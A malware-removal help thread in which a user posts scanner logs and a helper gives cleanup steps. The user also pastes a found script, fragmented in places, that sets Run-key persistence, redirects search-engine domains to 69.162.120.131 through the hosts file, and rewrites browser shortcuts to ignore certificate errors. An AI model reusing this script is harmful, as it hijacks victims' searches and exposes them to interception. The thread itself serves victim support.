Jump to content

Recommended Posts

Hello everyone,

 

I'd like some help with what I think is some sort of malware/rootkit that has infected my pc.

I think I need to do a series of thorough scans since for a few days in a row I kept getting 5 processes (rundll32.exe) that would pop up a "open file with" window right after I booted. I never clicked open and eventually found out that the rundll32.exe was in C:\Windows\SysWOW64 and I also did all scans with malwarebytes, roguekiller64, microsoft essentials and haven't found much. But I also found a registry key under Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce with a filename Adobe Speed Launcher which I don't quite like and its value is set to 1421941580. Anyway, any help with a series of scans would be appreciated.

 

-I'm very confident that this is some sort of malware.

The reason being is that this has never happened before, and there are 5 instances of said window when I just boot up. This has never happened before, and the other clue that this is not some legit program is that under the "Program/File" name I see MY first name and that just can't be right.

 

-I've found also found a "FILE" under C:\Users named "Tom" and I've attached it.

It looks super suspicious I think. I scanned it with VirusTotal but it doesn't seem to find anything wrong with it, nonetheless the results are here: https://www.virustotal.com/en/file/60c32e7ba31fd30810d23222932a76129a7aa13347ece280c3a89f785c72d997/analysis/1421971881/

I proceeded to open it and it seems to be a text file with some code on it that I think is dead on some sort of malware trying to connect to some ip address that's not even mine: 69.162.120.131

 

 


UPDATE:

 

Now this is probably bad.

 

Another shortcut to a .exe file appeared on my desktop under the fake name "VLC Media Player" which I obviously have never installed since I hate that player.

The shortcut's target is "C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe" C:\Users\TOMJO~1\AppData\Local\Temp\bcdcabfdbbfi.exe 7-5-1-8-9-0-7-5-3-1-1 KEtIPDQxMjAyHy5MUEFIQEQ2Kx0uTT5PVkdJS0I/OjAfKD9IS0tJPTguNjcrGy47QEQ2Kx0uT0tKQ006VFhEQTwwMCswGCZTPk1TRFFYUFFENGhtb205LihuZGpt

 


 

Someone gotta help me get rid of this stuff that apparently none of the tools I've used so far has detected anything...


 

 

-pasted roguekiller report AND mbam log, FRST, Addition, OTL reports

 

 

 

 

 

RogueKiller V10.2.0.0 (x64) [Jan 19 2015] by Adlice Software





 

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version

Started in : Normal mode

User : Tom Jones [Administrator]

Mode : Scan -- Date : 01/22/2015 11:25:29

 

¤¤¤ Processes : 0 ¤¤¤

 

¤¤¤ Registry : 4 ¤¤¤

[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found

[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found

[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found

[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found

 

¤¤¤ Tasks : 0 ¤¤¤

 

¤¤¤ Files : 0 ¤¤¤

 

¤¤¤ Hosts File : 2 ¤¤¤

[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost

[C:\Windows\System32\drivers\etc\hosts] ::1 localhost

 

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

 

¤¤¤ Web browsers : 0 ¤¤¤

 

¤¤¤ MBR Check : ¤¤¤

+++++ PhysicalDrive0: WDC WD1502FAEX-007BA0 ATA Device +++++

--- User ---

[MBR] 97ed83405a22741aa5222a22e681b176

[bSP] e5e13b1e52b32315f7fa08500dcdf184 : Windows Vista/7/8 MBR Code

Partition table:

0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1430797 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]

User = LL1 ... OK

User = LL2 ... OK

 

+++++ PhysicalDrive1: INTEL SS DSC2CW120A3 SCSI Disk Device +++++

--- User ---

[MBR] b7e0dc6f6c3f2ac7a7eca2b4ee48a17c

[bSP] 1f82269f5ba8a4c12ac33d16d54131fc : Windows Vista/7/8 MBR Code

Partition table:

0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]

1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]

User = LL1 ... OK

Error reading LL2 MBR! ([1] Incorrect function. )

 

 

============================================

RKreport_DEL_01212015_224147.log - RKreport_DEL_01212015_224200.log - RKreport_DEL_01212015_225447.log - RKreport_DEL_01212015_225932.log

RKreport_DEL_01222015_001748.log - RKreport_SCN_01212015_223814.log - RKreport_SCN_01212015_224326.log - RKreport_SCN_01212015_225859.log

RKreport_SCN_01212015_233829.log - RKreport_SCN_01222015_001707.log

 

 

 

Thank you!

FRST.txt

Addition.txt

mbar-log-2015-01-22 (21-07-22).txt

Tom.txt

Link to post
Share on other sites

Hello,

They call me TwinHeadedEagle around here, and I'll be working with you.

Before we start please read and note the following:

  • Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
  • Please be patient. I know it is frustrating when your PC isn't working properly, but malware removal takes time.
  • Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
  • Do not paste the logs in your posts, attachments make my work easier. There is a More reply options button, that gives you Upload Files option below which you can use to attach your reports. Always attach reports from all tools.
  • Always execute my instructions in given order. If for some reason you cannot completely follow one instruction, inform me about that.
  • Stay with me to the end, the absence of symptoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, what may cause some delays between answers.
  • Do not ask for help for your business PC. Companies are making revenue via computers, so it is good thing to pay someone to repair it.
  • If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
:excl: I can't foresee everything, so if anything unexpected happens, please stop and inform me!

:excl: There are no silly questions. Never be afraid to ask if in doubt!

warning.gif Rules and policies

We won't support any piracy.

That being told, if any evidence of illegal OS, software, cracks/keygens or any other will be revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!

The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result with closing your topic and withdrawning any assistance.

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatibale with your system. If you are not sure which version applies to your system download both of them and try to run them.

Only one of them will run on your system, that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.
Link to post
Share on other sites

Hello again and thank you for your reply.

 

Attached FRST.txt and Addition.txt.

 

Please take a look at my post specifically in the part where I inform you about this file found in C:\Users\ named "Tom" as my first name. I opened it before and I see some windows script that tries to do something with some web addresses such as google, yahoo etc while trying to relay information to an IP that is NOT mine.

 

Thank you in advance!

FRST.txt

Addition.txt

Link to post
Share on other sites

From the reports above I do not see anything serious here. We will perform some maintenance and check your PC deeply.
 
 
 
FRST.gif Fix with Farbar Recovery Scan Tool
 

icon_exclaim.gif This fix was created for this user for use on that particular machine.
icon_exclaim.gif Running it on another one may cause damage and render the system unstable.

 
Download attached fixlist.txt file and save it to the Desktop:
 
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please post it to your reply.
 
 
 
 

adwcleaner_new.png Fix with AdwCleaner
 
Please download AdwCleaner by Xplode and save the file to your Desktop.

  • Right-click on adwcleaner_new.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Wait until the database is updated.
  • Accept the Terms of use and click Scan.
  • When finished, please click Clean.
  • Upon completion, click Report. A log (AdwCleaner[s*].txt) will open.

Please upload report in your reply.
 
Note: Reports will be saved in your system partition, usually at C:\Adwcleaner
 
 
 
 

TDSSKiller_Kaspersky.png Scan with TDSSKiller
 
Please download TDSSKiller by Kaspersky and save it to your desktop.

  • Right-click on TDSSKiller_Kaspersky.png
  • icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Click on Change parameters and put a checkmark beside Loaded modules. A reboot will be needed to apply the changes, allow it to do so.
  • Your machine may appear very slow and unusable after that - it's normal.
  • TDSSKiller will run automaticaly. Click on Change parameters and click OK.
  • Click the Start Scan button and wait patiently.
  • If anything will be found follow this guidelines:
    • If a suspicious object is detected, the default action will be Skip, click on Continue.
    • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
      Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.
      If Cure is not available, please choose Skip instead.
    • Do not choose Delete unless instructed!
    A report will be created in your root directory, (usually C:\ drive) in the form of TDSSKiller.[Version]_[Date]_[Time]_log.txt. Please include the contents of that file in your next post.

fixlist.txt

Link to post
Share on other sites

Does anyone around here have any clue what this script is doing?

-This was a file without an extension, found in C:\Users\

Please let me know even if you know a bit of it.

@echo off Jones\AppData\Roaming\Windaws.batREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat3" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys32.vbs" Jones\AppData\Roaming\Windaws.batREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat4" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys33.vbs" Jones\AppData\Roaming\Windaws.batREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat1" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Macrosoft.vbs" Jones\AppData\Roaming\Windaws.batREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat2" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Systm.vbs" Jones\AppData\Roaming\Windaws.batREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Windaws.bat" Jones\AppData\Roaming\Windaws.batREG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.google.com" /F Jones\AppData\Roaming\Windaws.batREG ADD "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HomePage /t REG_DWORD /d 1 /f Jones\AppData\Roaming\Windaws.batcd /D "%APPDATA%\Mozilla\Firefox\Profiles" Jones\AppData\Roaming\Windaws.batcd *.default Jones\AppData\Roaming\Windaws.batset buzaar=%cd% Jones\AppData\Roaming\Windaws.batecho user_pref("browser.newtab.url", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.batecho user_pref("browser.startup.homepage", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.batset buzaar= Jones\AppData\Roaming\Windaws.batcd %windir% Jones\AppData\Roaming\Windaws.batset bugalatasligala=%windir%\System32\drivers\etc\hosts Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 www.google.com" %bugalatasligala% || echo 69.162.120.131 www.google.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 www.bing.com" %bugalatasligala% || echo 69.162.120.131 www.bing.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 www.google.co.uk" %bugalatasligala% || echo 69.162.120.131 www.google.co.uk>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 www.google.ca" %bugalatasligala% || echo 69.162.120.131 www.google.ca>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 www.google.com.tr" %bugalatasligala% || echo 69.162.120.131 www.google.com.tr>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 isearch.babylon.com" %bugalatasligala% || echo 69.162.120.131 isearch.babylon.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 search.conduit.com" %bugalatasligala% || echo 69.162.120.131 search.conduit.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 www.yahoo.com" %bugalatasligala% || echo 69.162.120.131 www.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 us.yhs4.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 us.yhs4.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 r.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 r.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 www.aol.com" %bugalatasligala% || echo 69.162.120.131 www.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 search.aol.com" %bugalatasligala% || echo 69.162.120.131 search.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 search.comcast.net" %bugalatasligala% || echo 69.162.120.131 search.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 www.google.co.in" %bugalatasligala% || echo 69.162.120.131 www.google.co.in>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 www.ask.com" %bugalatasligala% || echo 69.162.120.131 www.ask.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 xfinity.comcast.net" %bugalatasligala% || echo 69.162.120.131 xfinity.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batfind "69.162.120.131 search.avg.com" %bugalatasligala% || echo 69.162.120.131 search.avg.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.batexit Jones\AppData\Roaming\Windaws.batSET wsc = WScript.CreateObject("WScript.Shell") Jones\AppData\Roaming\Systm.vbsSET fso = WScript.CreateObject("Scripting.FileSystemObject") Jones\AppData\Roaming\Systm.vbsIf (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK")) Then Jones\AppData\Roaming\Systm.vbsSET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK") Jones\AppData\Roaming\Systm.vbsIf (fso.FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) Then Jones\AppData\Roaming\Systm.vbsbozcaada.targetpath = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbselse Jones\AppData\Roaming\Systm.vbsbozcaada.targetpath = "C:\Program Files\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbsEnd If Jones\AppData\Roaming\Systm.vbsbozcaada.Arguments = "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars" Jones\AppData\Roaming\Systm.vbsbozcaada.save() Jones\AppData\Roaming\Systm.vbsEnd If 'uz Jones\AppData\Roaming\Systm.vbsIf (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys33.vbsSET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys33.vbsIf (fso.FileExists("C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) Then Jones\AppData\Roaming\Sys33.vbsbozcaada.targetpath = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbsbozcaada.targetpath = "C:\Program Files\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbsbozcaada.Arguments = "http://www.google.com" Jones\AppData\Roaming\Sys33.vbsEnd If 'ez Jones\AppData\Roaming\Sys33.vbsIf (fso.FileExists(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys32.vbsSET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys32.vbsEnd If 'oz Jones\AppData\Roaming\Sys32.vbsIf (fso.FileExists(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK")) Then Jones\AppData\Roaming\Macrosoft.vbsSET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK") Jones\AppData\Roaming\Macrosoft.vbsEnd If 'az Jones\AppData\Roaming\Macrosoft.vbs
Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.